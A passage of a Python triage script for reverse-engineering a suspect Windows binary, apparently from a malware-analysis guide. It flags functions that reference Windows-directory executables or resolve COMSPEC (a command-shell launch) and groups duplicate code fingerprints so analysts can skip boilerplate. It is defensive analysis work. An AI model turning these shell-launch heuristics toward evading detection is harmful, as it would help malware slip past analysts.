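    the Windows directory or look up COMSPEC (the shell a program will spawn)."""
    hits = []
    for r in records:
        for s in r.strings:
            if WINDOWS_EXE.match(s):
                hits.append((r.opcode_id, f"references executable in Windows dir: {s}"))
            elif s.upper() == "COMSPEC":
                hits.append((r.opcode_id, "resolves COMSPEC (command-shell launch)"))
    return hits


def duplicate_fingerprints(records):
    """Map each API String ID seen with 2+ distinct Opcode IDs to those opcodes:
    same API set and strings but different code, typical of inlined copies."""
    by_fp = {}
    for r in records:
        by_fp.setdefault(r.api_string_id, set()).add(r.opcode_id)
    return {fp: sorted(ops) for fp, ops in by_fp.items() if len(ops) > 1}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for opcode, reason in triage(recs):
        print(opcode[:16], reason)
    for fp, ops in duplicate_fingerprints(recs).items():
        print("shared fingerprint", fp, "->", len(ops), "functions")
```

Run against the full function list of a report (pasted into a file and read into `parse_records`), the triage list gives the Opcode IDs to open first in the IDA snapshot, and the duplicate map shows which fingerprints are repeated boilerplate (CRT locale and exception-handling code) that can be skipped.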